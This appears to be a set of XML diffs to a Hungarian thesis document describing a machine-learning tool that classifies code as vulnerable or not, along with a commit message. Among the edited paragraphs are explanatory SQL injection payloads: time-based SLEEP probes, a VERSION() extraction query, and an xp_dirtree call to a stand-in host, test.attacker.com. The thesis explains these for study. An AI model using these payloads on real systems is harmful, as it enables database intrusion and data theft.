+        <w:t>trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, az osztályozásért felelős fájl </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tud használni.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19617,44 +19920,6 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egy olyan .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>npy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlt hoz létre, amit később egy osztályozási algoritmus tud használni.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kifejtve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19670,7 +19935,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trainer</w:t>
+        <w:t>diagrams</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -24878,6 +25143,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Bekezdsalapbettpusa">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normltblzat">

</xml_diff>

<commit_message>
Add pretty table in trainer.py
</commit_message>
<xml_diff>
--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -1916,7 +1916,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1990,7 +1990,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2064,7 +2064,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2155,7 +2155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2247,7 +2247,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2337,7 +2337,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2427,7 +2427,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2518,7 +2518,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2611,7 +2611,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2702,7 +2702,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2795,7 +2795,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2887,7 +2887,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2979,7 +2979,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3071,7 +3071,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3163,7 +3163,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3255,7 +3255,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3348,7 +3348,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3441,7 +3441,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3532,7 +3532,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3623,7 +3623,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3697,7 +3697,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3771,7 +3771,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3845,7 +3845,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3919,7 +3919,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4575,21 +4575,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egyes esetekben</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> parancsokat adhat ki az operációs rendszernek</w:t>
+        <w:t>, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és egyes esetekben parancsokat adhat ki az operációs rendszernek</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6733,155 +6719,119 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=1-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SLEEP(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>card</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=1-IF(MID(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>VERSION(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7094,48 +7044,52 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dekódoláskor a </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dekódoláskor a </w:t>
+        <w:t>%20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7143,13 +7097,13 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%20</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és a </w:t>
+        <w:t>%5c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7157,43 +7111,27 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%5c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
-      </w:r>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18153,159 +18091,342 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenate</w:t>
+        <w:t>concatenated_title</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>d_title</w:t>
+        <w:t>d</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>d</w:t>
+        <w:t>.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kézett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>_titled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-ben</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>-t dolgozza fel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">olyan </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>csv</w:t>
+        <w:t>numpy</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
